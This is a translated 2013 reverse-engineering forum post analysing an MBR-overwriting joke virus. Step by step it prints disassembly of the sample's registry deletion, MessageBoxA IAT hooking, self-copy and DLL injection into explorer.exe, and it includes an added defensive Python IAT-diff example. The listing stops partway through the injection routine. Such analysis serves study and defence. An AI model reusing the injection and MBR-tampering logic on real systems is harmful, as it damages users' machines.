吾爱破解 - 52pojie.cn

[PC sample analysis] A detailed analysis of a malicious MBR sample

JoyChou posted on 2013-7-11 11:31
This post was last edited by JoyChou on 2013-7-14 18:21

Basic information:
  Report name: OhMyGod virus analysis
  Author: JoyChou
  Sample type: MBR infector
  Sample file size: 268 KB (274,432 bytes)
  Sample MD5: 3AE53CB468E2DF56A3E424E934BF30CF
  Packer: none

Overview
This sample is a joke virus that modifies the MBR.

Symptoms of an infected system
After infection, the computer no longer boots normally on restart and only displays a string of characters.

File system changes
Modifies the MBR; drops rand().txt and rand().dll

Registry changes
Deletes the HKEY_CURRENT_USER subkey Keyboard Layout\Preload, removing the input methods

Network symptoms

We arrive at the OEP and see several key calls; let's analyze each of them in detail
004017A0  /$  E8 FBFEFFFF   call OhMyGod.004016A0
004017A5  |.  E8 76FDFFFF   call OhMyGod.00401520
004017AA  |.  E8 A1F8FFFF   call OhMyGod.00401050
004017AF  |.  E8 5CFDFFFF   call OhMyGod.00401510
004017B4  |.  E8 C7F8FFFF   call OhMyGod.00401080
004017B9  |.  E8 92F9FFFF   call OhMyGod.00401150
004017BE  |.  E8 0DFFFFFF   call OhMyGod.004016D0
004017C3  |.  E8 58F8FFFF   call OhMyGod.00401020
004017C8  |.  6A 00         push 0x0                                 ; /Style = MB_OK|MB_APPLMODAL
004017CA  |.  68 1C914000   push OhMyGod.0040911C                    ; |111
004017CF  |.  68 14914000   push OhMyGod.00409114                    ; |Good
004017D4  |.  6A 00         push 0x0                                 ; |hOwner = NULL
004017D6  |.  FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
004017DC  |.  E8 EFFAFFFF   call OhMyGod.004012D0
004017E1  |.  6A 00         push 0x0
004017E3  |.  6A 02         push 0x2
004017E5  |.  E8 B6FCFFFF   call OhMyGod.004014A0
004017EA  |.  83C4 08       add esp,0x8
004017ED  \.  C3            retn
 
004017A0  /$  E8 FBFEFFFF   call OhMyGod.004016A0   step into this call
004016A0  |$  6A 00         push 0x0                                 ; /pThreadId = NULL
004016A2  |.  6A 00         push 0x0                                 ; |CreationFlags = 0
004016A4  |.  6A 00         push 0x0                                 ; |pThreadParm = NULL
004016A6  |.  68 60154000   push OhMyGod.00401560                    ; |creates a thread; we go to the thread function
004016AB  |.  6A 00         push 0x0                                 ; |StackSize = 0
004016AD  |.  6A 00         push 0x0                                 ; |pSecurity = NULL
004016AF  |.  FF15 74804000 call dword ptr ds:[<&KERNEL32.CreateThre>; \CreateThread
004016B5  |.  50            push eax                                 ; /hObject
004016B6  |.  FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
004016BC  \.^ E9 CFFFFFFF   jmp OhMyGod.00401690
 
We arrive at the thread function
00401560   83EC 0C       sub esp,0xC
00401563   53            push ebx
00401564   55            push ebp
00401565   56            push esi
00401566   57            push edi
00401567   .  E8 E4FAFFFF   call OhMyGod.00401050                    // deletes registry info (did not step into this call; it is simple)
0040156C   .  33DB          xor ebx,ebx
0040156E   .  68 3F000F00   push 0xF003F
00401573   53            push ebx
00401574   53            push ebx
00401575   .  FF15 04804000 call dword ptr ds:[<&ADVAPI32.OpenSCMana>;  opens the service manager; SCM stands for service control manager
0040157B   .  8BE8          mov ebp,eax
0040157D   .  3BEB          cmp ebp,ebx
0040157F   .  75 0C         jnz XOhMyGod.0040158D
00401581   5F            pop edi
00401582   5E            pop esi
00401583   5D            pop ebp
00401584   33C0          xor eax,eax
00401586   5B            pop ebx
00401587   83C4 0C       add esp,0xC
0040158A   .  C2 0400       retn 0x4
0040158D   >  8D4424 14     lea eax,dword ptr ss:[esp+0x14]
00401591   8B3D 08804000 mov edi,dword ptr ds:[<&ADVAPI32.EnumSer>;  advapi32.EnumServicesStatusA
00401597   53            push ebx                                 ; /pResumeHandle
00401598   8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]          ; |
0040159C   .  50            push eax                                 ; |pCount
0040159D   .  51            push ecx                                 ; |pBytesNeeded
0040159E   .  53            push ebx                                 ; |BufSize
0040159F   .  53            push ebx                                 ; |pEnumStatus
004015A0   6A 03         push 0x3                                 ; |ServiceState = 3
004015A2   6A 3B         push 0x3B                                ; |ServiceType = SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_RECOGNIZER_DRIVER|SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
004015A4   55            push ebp                                 ; |hManager
004015A5   895C24 34     mov dword ptr ss:[esp+0x34],ebx          ; |
004015A9   895C24 30     mov dword ptr ss:[esp+0x30],ebx          ; |
004015AD   .  FFD7          call edi                                 ; \enumerate services
004015AF   .  8B5424 10     mov edx,dword ptr ss:[esp+0x10]
004015B3   52            push edx                                 ; /Size
004015B4   6A 40         push 0x40                                ; |Flags = LPTR
004015B6   .  FF15 70804000 call dword ptr ds:[<&KERNEL32.LocalAlloc>; \LocalAlloc  ; allocate memory
004015BC   .  8BF0          mov esi,eax
004015BE   .  3BF3          cmp esi,ebx
004015C0   75 13         jnz XOhMyGod.004015D5
004015C2   55            push ebp
004015C3   .  FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServi>;  close the service handle
004015C9   5F            pop edi
004015CA   .  5E            pop esi
004015CB   .  5D            pop ebp
004015CC   .  33C0          xor eax,eax
004015CE   .  5B            pop ebx
004015CF   .  83C4 0C       add esp,0xC
004015D2   .  C2 0400       retn 0x4
 
 
Now let's look at the second call
004017A5  |.  E8 76FDFFFF   call OhMyGod.00401520
Step in
00401520  /68 E0904000   push OhMyGod.004090E0                    ; /jinguizi
00401525  |.  6A 00         push 0x0                                 ; |InitialOwner = FALSE
00401527  |.  6A 00         push 0x0                                 ; |pSecurity = NULL
00401529  |.  FF15 68804000 call dword ptr ds:[<&KERNEL32.CreateMute>; \creates a mutex named JinGuiZi so that only one instance of the program can run; no double launch
0040152F  |.  85C0          test eax,eax
00401531  |.  74 26         je XOhMyGod.00401559
00401533  |.  FF15 C0804000 call dword ptr ds:[<&KERNEL32.GetLastErr>; [GetLastError
00401539  |.  3D B7000000   cmp eax,0xB7
0040153E  |.  75 19         jnz XOhMyGod.00401559
00401540  |.  6A 00         push 0x0                                 ; /Style = MB_OK|MB_APPLMODAL
00401542  |.  6A 00         push 0x0                                 ; |Title = NULL
00401544  |.  68 CC904000   push OhMyGod.004090CC                    ; |"only one instance of the program may run"
00401549  |.  6A 00         push 0x0                                 ; |hOwner = NULL
0040154B  |.  FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00401551  |.  6A 00         push 0x0                                 ; /ExitCode = 0
00401553  |.  FF15 60804000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
00401559  \>  C3            retn
 
Now let's enter the third call, 004017AA  |.  E8 A1F8FFFF   call OhMyGod.00401050
Again it opens the registry and deletes a subkey
00401050  /51            push ecx                                 ;  delete HKEY_CURRENT_USER subkey Keyboard Layout\Preload
00401051  |.  8D4424 00     lea eax,dword ptr ss:[esp]
00401055  |.  50            push eax                                 ; /pHandle
00401056  |.  6A 08         push 0x8                                 ; |Access = KEY_ENUMERATE_SUB_KEYS
00401058  |.  6A 00         push 0x0                                 ; |Reserved = 0
0040105A  |.  68 44904000   push OhMyGod.00409044                    ; |Keyboard Layout\Preload
0040105F  |.  68 01000080   push 0x80000001                          ; |hKey = HKEY_CURRENT_USER
00401064  |.  FF15 1C804000 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
0040106A  |.  68 44904000   push OhMyGod.00409044                    ; /Keyboard Layout\Preload
0040106F  |.  68 01000080   push 0x80000001                          ; |hKey = HKEY_CURRENT_USER
00401074  |.  FF15 20804000 call dword ptr ds:[<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA
0040107A  |.  59            pop ecx
0040107B  \.  C3            retn
 
Now look at the fourth call, 004017AF  |.  E8 5CFDFFFF   call OhMyGod.00401510
00401510  /6A 00         push 0x0                                 ; /Enable = FALSE
00401512  |.  FF15 60814000 call dword ptr ds:[<&USER32.GetForegroun>; |[GetForegroundWindow
00401518  |.  50            push eax                                 ; |hWnd
00401519  |.  FF15 50814000 call dword ptr ds:[<&USER32.EnableWindow>; \EnableWindow
0040151F  \.  C3            retn
 
Next the fifth call, 004017B4  |.  E8 C7F8FFFF   call OhMyGod.00401080
00401080  /81EC 04010000 sub esp,0x104
00401086  |.  8D4424 04     lea eax,dword ptr ss:[esp+0x4]
0040108A  |.  68 00050000   push 0x500                               ; /BufSize = 500 (1280.)
0040108F  |.  50            push eax                                 ; |Buffer
00401090  |.  FF15 B4804000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401096  |.  85C0          test eax,eax
00401098  |.  75 14         jnz XOhMyGod.004010AE
0040109A  |.  68 78904000   push OhMyGod.00409078
0040109F  |.  E8 62080000   call OhMyGod.00401906
004010A4  |.  83C4 04       add esp,0x4
004010A7  |.  81C4 04010000 add esp,0x104
004010AD  |.  C3            retn
004010AE  |>  56            push esi
004010AF  |.  6A 00         push 0x0
004010B1  |.  E8 74070000   call OhMyGod.0040182A
004010B6  |.  50            push eax
004010B7  |.  E8 46070000   call OhMyGod.00401802
004010BC  |.  E8 4B070000   call OhMyGod.0040180C                    ;  get a random number and name the new txt file after it, just for amusement
004010C1  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10]
004010C5  |.  68 0C184000   push OhMyGod.0040180C                    ; /<%ld> = 40180C (4200460.)
004010CA  |.  51            push ecx                                 ; |<%s>
004010CB  |.  8D9424 980000>lea edx,dword ptr ss:[esp+0x98]          ; |
004010D2  |.  68 6C904000   push OhMyGod.0040906C                    ; |Format = "%s\%ld.txt"
004010D7  |.  52            push edx                                 ; |s
004010D8  |.  FF15 58814000 call dword ptr ds:[<&USER32.wsprintfA>]  ; \wsprintfA
004010DE  |.  83C4 18       add esp,0x18
004010E1  |.  8D8424 880000>lea eax,dword ptr ss:[esp+0x88]          ;  create rand().txt in the Windows directory
004010E8  |.  6A 00         push 0x0                                 ; /hTemplateFile = NULL
004010EA  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
004010EF  |.  6A 02         push 0x2                                 ; |Mode = CREATE_ALWAYS
004010F1  |.  6A 00         push 0x0                                 ; |pSecurity = NULL
004010F3  |.  6A 02         push 0x2                                 ; |ShareMode = FILE_SHARE_WRITE
004010F5  |.  68 00000010   push 0x10000000                          ; |Access = GENERIC_ALL
004010FA  |.  50            push eax                                 ; |FileName
004010FB  |.  FF15 B8804000 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA
00401101  |.  8D4C24 04     lea ecx,dword ptr ss:[esp+0x4]           ;  write "金龟子真棒" ("JinGuiZi is awesome")
00401105  |.  6A 00         push 0x0                                 ; /pOverlapped = NULL
00401107  |.  51            push ecx                                 ; |pBytesWritten
00401108  |.  8BF0          mov esi,eax                              ; |
0040110A  |.  6A 0E         push 0xE                                 ; |nBytesToWrite = E (14.)
0040110C  |.  68 5C904000   push OhMyGod.0040905C                    ; |Buffer = OhMyGod.0040905C
00401111  |.  56            push esi                                 ; |hFile
00401112  |.  FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile
00401118  |.  56            push esi                                 ; /hObject
00401119  |.  FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
0040111F  |.  E8 2CFFFFFF   call OhMyGod.00401050
00401124  |.  5E            pop esi
00401125  |.  81C4 04010000 add esp,0x104
0040112B  \.  C3            retn
 
Let's step into 004010B1  |.  E8 74070000   call OhMyGod.0040182A and take a look
It gets a random number

Before looking at the sixth call, let's look at the import table of the parent sample

Import table


Next, continuing
00401150  /83EC 24       sub esp,0x24
00401153  |.  53            push ebx
00401154  |.  56            push esi
00401155  |.  57            push edi                                                  ;  get the current process
00401156  |.  6A 00         push 0x0                                                  ; /pModule = NULL
00401158  |.  FF15 64804000 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>]          ; \GetModuleHandleA
0040115E  |.  8BF8          mov edi,eax
00401160  |.  8B47 3C       mov eax,dword ptr ds:[edi+0x3C]                           ;  get the PE header
00401163  |.  8BB438 800000>mov esi,dword ptr ds:[eax+edi+0x80]                       ;  get the import table
0040116A  |.  8B443E 10     mov eax,dword ptr ds:[esi+edi+0x10]                       ;  get the IAT
0040116E  |.  03F7          add esi,edi
00401170  |.  85C0          test eax,eax
00401172  |.  74 21         je XOhMyGod.00401195
00401174  |.  8B1D 9C804000 mov ebx,dword ptr ds:[<&KERNEL32.lstrcmpiA>]              ;  put the address of lstrcmpiA into ebx
0040117A  |>  8B46 0C       /mov eax,dword ptr ds:[esi+0xC]                           ;  get the import descriptor's DLL name
0040117D  |.  68 8C904000   |push OhMyGod.0040908C                                    ;  ASCII "USER32.DLL"
00401182  |.  03C7          |add eax,edi
00401184  |.  50            |push eax
00401185  |.  FFD3          |call ebx
00401187  |.  85C0          |test eax,eax                                             ;  check whether it is user32.dll
00401189  |.  74 0A         |je XOhMyGod.00401195
0040118B  |.  8B46 24       |mov eax,dword ptr ds:[esi+0x24]
0040118E  |.  83C6 14       |add esi,0x14                                             ;  advance by one whole import descriptor, 0x14 bytes
00401191  |.  85C0          |test eax,eax
00401193  |.^ 75 E5         \jnz XOhMyGod.0040117A
00401195  |>  8B76 10       mov esi,dword ptr ds:[esi+0x10]                           ;  put user32.dll's IAT into esi
00401198  |.  85F6          test esi,esi
0040119A  |.  74 6C         je XOhMyGod.00401208
0040119C  |.  8B043E        mov eax,dword ptr ds:[esi+edi]
0040119F  |.  03F7          add esi,edi
004011A1  |.  85C0          test eax,eax
004011A3  |.  74 63         je XOhMyGod.00401208
004011A5  |.  8B1D A0804000 mov ebx,dword ptr ds:[<&KERNEL32.VirtualQuery>]           ;  kernel32.VirtualQuery
004011AB  |.  8B3D A4804000 mov edi,dword ptr ds:[<&KERNEL32.VirtualProtect>]         ;  kernel32.VirtualProtect
004011B1  |.  55            push ebp
004011B2  |.  8B2D A8804000 mov ebp,dword ptr ds:[<&KERNEL32.WriteProcessMemory>]     ;  kernel32.WriteProcessMemory
004011B8  |>  3B05 E8BA4000 /cmp eax,dword ptr ds:[0x40BAE8]                          ;  user32.MessageBoxA
004011BE  |.  75 3D         |jnz XOhMyGod.004011FD
004011C0  |.  8D4C24 18     |lea ecx,dword ptr ss:[esp+0x18]
004011C4  |.  6A 1C         |push 0x1C
004011C6  |.  51            |push ecx
004011C7  |.  56            |push esi
004011C8  |.  FFD3          |call ebx                                                 ;  // VirtualQuery
004011CA  |.  8D5424 14     |lea edx,dword ptr ss:[esp+0x14]
004011CE  |.  52            |push edx
004011CF  |.  6A 04         |push 0x4
004011D1  |.  6A 04         |push 0x4
004011D3  |.  56            |push esi
004011D4  |.  FFD7          |call edi                                                 ;  // VirtualProtect
004011D6  |.  6A 00         |push 0x0
004011D8  |.  8D4424 14     |lea eax,dword ptr ss:[esp+0x14]
004011DC  |.  6A 04         |push 0x4                                                 ;  4 bytes in size
004011DE  |.  50            |push eax                                                 ;  push the MessageBoxA function address
004011DF  |.  56            |push esi
004011E0  |.  C74424 20 301>|mov dword ptr ss:[esp+0x20],OhMyGod.00401130
004011E8  |.  FF15 AC804000 |call dword ptr ds:[<&KERNEL32.GetCurrentProcess>]        ; GetCurrentProcess
004011EE  |.  50            |push eax
004011EF  |.  FFD5          |call ebp                                                 ;  // WriteProcessMerory
004011F1  |.  8B4C24 14     |mov ecx,dword ptr ss:[esp+0x14]                          ;  write the MessageBoxA function address to esi
004011F5  |.  6A 00         |push 0x0
004011F7  |.  51            |push ecx
004011F8  |.  6A 04         |push 0x4
004011FA  |.  56            |push esi
004011FB  |.  FFD7          |call edi                                                 ;  // VirtualProtect
004011FD  |>  8B46 04       |mov eax,dword ptr ds:[esi+0x4]                           ;  find the MessageBoxA function address; it is used when popping up "good job"
00401200  |.  83C6 04       |add esi,0x4
00401203  |.  85C0          |test eax,eax
00401205  |.^ 75 B1         \jnz XOhMyGod.004011B8
00401207  |.  5D            pop ebp
00401208  |>  5F            pop edi
00401209  |.  5E            pop esi
0040120A  |.  5B            pop ebx
0040120B  |.  83C4 24       add esp,0x24
0040120E  \.  C3            retn
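The loop above walks the module's import directory by hand: each IMAGE_IMPORT_DESCRIPTOR is 0x14 bytes, its Name field sits at +0xC and its FirstThunk (the IAT) at +0x10, and the IAT itself is scanned in 4-byte slots until a zero entry. The Python below is an added example and not part of the original post: it performs the same walk from the analyst's side over a constructed, flattened image (RVA equals offset, with made-up DLL names and fake resolved addresses), lists each DLL's IAT slots, and diffs two snapshots to spot a slot whose value has been overwritten, which is the check one runs to detect this kind of IAT patch. The helper names and the fixed offsets of the sample image are assumptions of the example.

```python
import struct

# Layout of IMAGE_IMPORT_DESCRIPTOR (32-bit PE). The listing above reads
# [esi+0xC] for Name, [esi+0x10] for FirstThunk and steps esi by 0x14.
DESCRIPTOR_SIZE = 0x14
NAME_OFFSET = 0x0C            # FirstThunk follows immediately at 0x10


def _cstring(image, rva):
    """Read a NUL-terminated ASCII string at the given offset."""
    end = image.index(b"\0", rva)
    return image[rva:end].decode("ascii")


def walk_imports(image, import_dir_rva):
    """Return {dll_name: [(slot_rva, value), ...]} for every descriptor.

    Assumes a flattened image where RVA == offset (true for the constructed
    sample below; a real PE needs section-based RVA-to-offset translation).
    """
    imports = {}
    desc = import_dir_rva
    while True:
        name_rva, first_thunk = struct.unpack_from("<II", image, desc + NAME_OFFSET)
        if first_thunk == 0:          # all-zero descriptor terminates the array
            break
        slots = []
        slot = first_thunk
        while True:                   # IAT: 4-byte entries until a zero entry
            value = struct.unpack_from("<I", image, slot)[0]
            if value == 0:
                break
            slots.append((slot, value))
            slot += 4
        imports[_cstring(image, name_rva)] = slots
        desc += DESCRIPTOR_SIZE
    return imports


def find_iat_slot(image, import_dir_rva, dll_name, target):
    """RVA of the IAT slot of dll_name that currently holds target, or None."""
    for dll, slots in walk_imports(image, import_dir_rva).items():
        if dll.lower() != dll_name.lower():
            continue
        for slot_rva, value in slots:
            if value == target:
                return slot_rva
    return None


def diff_iat(clean, suspect):
    """Compare two walk_imports() snapshots and return (dll, slot, old, new)
    for every slot whose resolved address changed, i.e. a candidate IAT hook."""
    changes = []
    for dll, slots in clean.items():
        after = dict(suspect.get(dll, []))
        for slot_rva, old in slots:
            new = after.get(slot_rva)
            if new is not None and new != old:
                changes.append((dll, slot_rva, old, new))
    return changes


def build_sample_image():
    """Constructed flattened image: two descriptors, their names and IATs at
    fixed offsets. All addresses are made up for this example."""
    image = bytearray(0x400)
    import_dir = 0x100
    image[0x200:0x20D] = b"KERNEL32.DLL\0"
    image[0x210:0x21B] = b"USER32.DLL\0"
    struct.pack_into("<III", image, 0x300, 0xAAAA0001, 0xAAAA0002, 0)   # kernel32 IAT
    struct.pack_into("<III", image, 0x320, 0xBBBB0001, 0xBBBB0002, 0)   # user32 IAT
    # Fields: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    struct.pack_into("<IIIII", image, import_dir, 0, 0, 0, 0x200, 0x300)
    struct.pack_into("<IIIII", image, import_dir + DESCRIPTOR_SIZE, 0, 0, 0, 0x210, 0x320)
    return bytes(image), import_dir   # third descriptor stays zero: the terminator


if __name__ == "__main__":
    image, import_dir = build_sample_image()
    clean = walk_imports(image, import_dir)
    # Simulate the overwrite seen in the listing: one user32 slot is repointed
    # at a function inside the sample's own image (0x401130 in the post).
    patched = bytearray(image)
    struct.pack_into("<I", patched, 0x320, 0x00401130)
    for change in diff_iat(clean, walk_imports(bytes(patched), import_dir)):
        print("IAT slot changed: dll=%s slot=0x%X old=0x%08X new=0x%08X" % change)
```

The same two-snapshot comparison applies to a live process: record the IAT of a clean module once, then periodically re-read the slots and report any that no longer match; a slot that points into a non-image region or into another module than the one named by the descriptor is the signal to investigate.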
 
 
Now look at the seventh call  004017BE  |.  E8 0DFFFFFF   call OhMyGod.004016D0
Step in
The procedure is: first get the current program's name, open the file, get the file size, allocate a buffer of that size,
read the whole file into that buffer, and finally write it to the newly created GuiZi.exe, completing the self-copy.
 
004016D0  /81EC 84000000 sub esp,0x84                                      ;  the author intended to copy its own file to GuiZi.exe in the system directory, but it did not succeed
The reason it fails: the second parameter of CreateFile should be GENERIC_READ, because the file only needs to be read
004016D6  |.  53            push ebx                                          ;  but why not just use CopyFile?
004016D7  |.  56            push esi
004016D8  |.  57            push edi
004016D9  |.  B9 1F000000   mov ecx,0x1F
004016DE  |.  33C0          xor eax,eax
004016E0  |.  8D7C24 11     lea edi,dword ptr ss:[esp+0x11]
004016E4  |.  C64424 10 00  mov byte ptr ss:[esp+0x10],0x0
004016E9  |.  68 80000000   push 0x80                                         ; /BufSize = 80 (128.)
004016EE  |.  F3:AB         rep stos dword ptr es:[edi]                       ; |
004016F0  |.  66:AB         stos word ptr es:[edi]                            ; |
004016F2  |.  AA            stos byte ptr es:[edi]                            ; |
004016F3  |.  8D4424 14     lea eax,dword ptr ss:[esp+0x14]                   ; |
004016F7  |.  50            push eax                                          ; |PathBuffer
004016F8  |.  6A 00         push 0x0                                          ; |hModule = NULL
004016FA  |.  FF15 80804000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>>; \GetModuleFileNameA
00401700  |.  8B1D B8804000 mov ebx,dword ptr ds:[<&KERNEL32.CreateFileA>]    ;  kernel32.CreateFileA
00401706  |.  6A 00         push 0x0                                          ; /hTemplateFile = NULL
00401708  |.  68 80000000   push 0x80                                         ; |Attributes = NORMAL
0040170D  |.  6A 03         push 0x3                                          ; |Mode = OPEN_EXISTING
0040170F  |.  6A 00         push 0x0                                          ; |pSecurity = NULL
00401711  |.  6A 03         push 0x3                                          ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401713  |.  8D4C24 24     lea ecx,dword ptr ss:[esp+0x24]                   ; |
00401717  |.  68 00000010   push 0x10000000                                   ; |Access = GENERIC_ALL
0040171C  |.  51            push ecx                                          ; |FileName
0040171D  |.  FFD3          call ebx                                          ; \CreateFileA
0040171F  |.  8D5424 0C     lea edx,dword ptr ss:[esp+0xC]
00401723  |.  8BF0          mov esi,eax
00401725  |.  52            push edx                                          ; /pFileSizeHigh
00401726  |.  56            push esi                                          ; |hFile
00401727  |.  FF15 7C804000 call dword ptr ds:[<&KERNEL32.GetFileSize>]       ; \GetFileSize
0040172D  |.  8B4424 0C     mov eax,dword ptr ss:[esp+0xC]
00401731  |.  6A 04         push 0x4                                          ; /flProtect = 4
00401733  |.  68 00100000   push 0x1000                                       ; |flAllocationType = 1000 (4096.)
00401738  |.  50            push eax                                          ; |dwSize
00401739  |.  6A 00         push 0x0                                          ; |lpAddress = NULL
0040173B  |.  6A 00         push 0x0                                          ; |hProcess = NULL
0040173D  |.  FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>]    ; \VirtualAllocEx
00401743  |.  8B5424 0C     mov edx,dword ptr ss:[esp+0xC]
00401747  |.  8D4C24 0C     lea ecx,dword ptr ss:[esp+0xC]
0040174B  |.  6A 00         push 0x0                                          ; /pOverlapped = NULL
0040174D  |.  8BF8          mov edi,eax                                       ; |
0040174F  |.  51            push ecx                                          ; |pBytesRead
00401750  |.  52            push edx                                          ; |BytesToRead
00401751  |.  57            push edi                                          ; |Buffer
00401752  |.  56            push esi                                          ; |hFile
00401753  |.  FF15 78804000 call dword ptr ds:[<&KERNEL32.ReadFile>]          ; \ReadFile
00401759  |.  6A 00         push 0x0                                          ; /hTemplateFile = NULL
0040175B  |.  68 80000000   push 0x80                                         ; |Attributes = NORMAL
00401760  |.  6A 02         push 0x2                                          ; |Mode = CREATE_ALWAYS
00401762  |.  6A 00         push 0x0                                          ; |pSecurity = NULL
00401764  |.  6A 03         push 0x3                                          ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401766  |.  68 00000010   push 0x10000000                                   ; |Access = GENERIC_ALL
0040176B  |.  68 F4904000   push OhMyGod.004090F4                             ; |FileName = "C:\WINDOWS\SYSTEM32\GuiZi.exe"
00401770  |.  FFD3          call ebx                                          ; \CreateFileA
00401772  |.  8B4C24 0C     mov ecx,dword ptr ss:[esp+0xC]
00401776  |.  8BD8          mov ebx,eax
00401778  |.  8D4424 0C     lea eax,dword ptr ss:[esp+0xC]
0040177C  |.  6A 00         push 0x0                                          ; /pOverlapped = NULL
0040177E  |.  50            push eax                                          ; |pBytesWritten
0040177F  |.  51            push ecx                                          ; |nBytesToWrite
00401780  |.  57            push edi                                          ; |Buffer
00401781  |.  53            push ebx                                          ; |hFile
00401782  |.  FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>]         ; \WriteFile
00401788  |.  8B3D B0804000 mov edi,dword ptr ds:[<&KERNEL32.CloseHandle>]    ;  kernel32.CloseHandle
0040178E  |.  53            push ebx                                          ; /hObject
0040178F  |.  FFD7          call edi                                          ; \CloseHandle
00401791  |.  56            push esi                                          ; /hObject
00401792  |.  FFD7          call edi                                          ; \CloseHandle
00401794  |.  5F            pop edi
00401795  |.  5E            pop esi
00401796  |.  5B            pop ebx                                           ;  7FFDE000
00401797  |.  81C4 84000000 add esp,0x84
0040179D  \.  C3            retn
 
 
Next the eighth call  004017C3  |.  E8 58F8FFFF   call OhMyGod.00401020
It decodes the ASCII string "Shabisafhlfiakhfdka" into "Shbeo}p{剱摖9孟 荏?K"; it looks like a decoy, a useless part
The ninth call just pops up a message box; we skip it
 
Next the tenth call, 004017DC  |.  E8 EFFAFFFF   call OhMyGod.004012D0
Function: creates rand().dll and LoadLibraryA(rand().dll) injected into the desktop process, so the system gets hit easily.
004012D0  /81EC 28010000 sub esp,0x128
004012D6  |.  53            push ebx
004012D7  |.  55            push ebp
004012D8  |.  56            push esi
004012D9  |.  57            push edi
004012DA  |.  33FF          xor edi,edi
004012DC  |.  C74424 10 280>mov dword ptr ss:[esp+0x10],0x128
004012E4  |.  57            push edi                                 ; /ProcessID => 0
004012E5  |.  6A 02         push 0x2                                 ; |Flags = TH32CS_SNAPPROCESS
004012E7  |.  E8 10050000   call <jmp.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
004012EC  |.  8BE8          mov ebp,eax
004012EE  |.  8D4424 10     lea eax,dword ptr ss:[esp+0x10]
004012F2  |.  50            push eax                                 ; /lppe
004012F3  |.  55            push ebp                                 ; |hSnapshot
004012F4  |.  E8 FD040000   call <jmp.&KERNEL32.Process32First>      ; \Process32First
004012F9  |.  85C0          test eax,eax
004012FB  |.  74 4F         je XOhMyGod.0040134C
004012FD  |>  BE A8904000   /mov esi,OhMyGod.004090A8                ;  ASCII "explorer.exe"
00401302  |.  8D4424 34     |lea eax,dword ptr ss:[esp+0x34]
00401306  |>  8A10          |/mov dl,byte ptr ds:[eax]
00401308  |.  8A1E          ||mov bl,byte ptr ds:[esi]
0040130A  |.  8ACA          ||mov cl,dl
0040130C  |.  3AD3          ||cmp dl,bl
0040130E  |.  75 1E         ||jnz XOhMyGod.0040132E
00401310  |.  84C9          ||test cl,cl
00401312  |.  74 16         ||je XOhMyGod.0040132A
00401314  |.  8A50 01       ||mov dl,byte ptr ds:[eax+0x1]
00401317  |.  8A5E 01       ||mov bl,byte ptr ds:[esi+0x1]
0040131A  |.  8ACA          ||mov cl,dl
0040131C  |.  3AD3          ||cmp dl,bl
0040131E  |.  75 0E         ||jnz XOhMyGod.0040132E
00401320  |.  83C0 02       ||add eax,0x2
00401323  |.  83C6 02       ||add esi,0x2
00401326  |.  84C9          ||test cl,cl
00401328  |.^ 75 DC         |\jnz XOhMyGod.00401306
0040132A  |>  33C0          |xor eax,eax
0040132C  |.  EB 05         |jmp XOhMyGod.00401333
0040132E  |>  1BC0          |sbb eax,eax
00401330  |.  83D8 FF       |sbb eax,-0x1
00401333  |>  85C0          |test eax,eax
00401335  |.  74 11         |je XOhMyGod.00401348
00401337  |.  8D4424 10     |lea eax,dword ptr ss:[esp+0x10]
0040133B  |.  50            |push eax                                ; /lppe
0040133C  |.  55            |push ebp                                ; |hSnapshot
0040133D  |.  E8 AE040000   |call <jmp.&KERNEL32.Process32Next>      ; \Process32Next
00401342  |.  85C0          |test eax,eax
00401344  |.^ 75 B7         \jnz XOhMyGod.004012FD
00401346  |.  EB 04         jmp XOhMyGod.0040134C
00401348  |>  8B7C24 18     mov edi,dword ptr ss:[esp+0x18]
0040134C  |>  57            push edi                                 ; /ProcessId
0040134D  |.  6A 00         push 0x0                                 ; |Inheritable = FALSE
0040134F  |.  68 FF0F1F00   push 0x1F0FFF                            ; |Access = PROCESS_ALL_ACCESS
00401354  |.  FF15 4C804000 call dword ptr ds:[<&KERNEL32.OpenProces>; \OpenProcess
0040135A  |.  8BF0          mov esi,eax
0040135C  |.  E8 AFFEFFFF   call OhMyGod.00401210                    ;  creates rand().dll in the system directory; used to write the MBR
00401361  |.  8BD8          mov ebx,eax
00401363  |.  83C9 FF       or ecx,0xFFFFFFFF
00401366  |.  8BFB          mov edi,ebx
00401368  |.  33C0          xor eax,eax
0040136A  |.  F2:AE         repne scas byte ptr es:[edi]
0040136C  |.  F7D1          not ecx
0040136E  |.  6A 04         push 0x4                                 ; /flProtect = 4
00401370  |.  49            dec ecx                                  ; |
00401371  |.  68 00100000   push 0x1000                              ; |flAllocationType = 1000 (4096.)
00401376  |.  51            push ecx                                 ; |dwSize
00401377  |.  50            push eax                                 ; |lpAddress => NULL
00401378  |.  56            push esi                                 ; |hProcess
00401379  |.  FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAll>; \VirtualAllocEx
0040137F  |.  8BE8          mov ebp,eax
00401381  |.  8BFB          mov edi,ebx
00401383  |.  83C9 FF       or ecx,0xFFFFFFFF
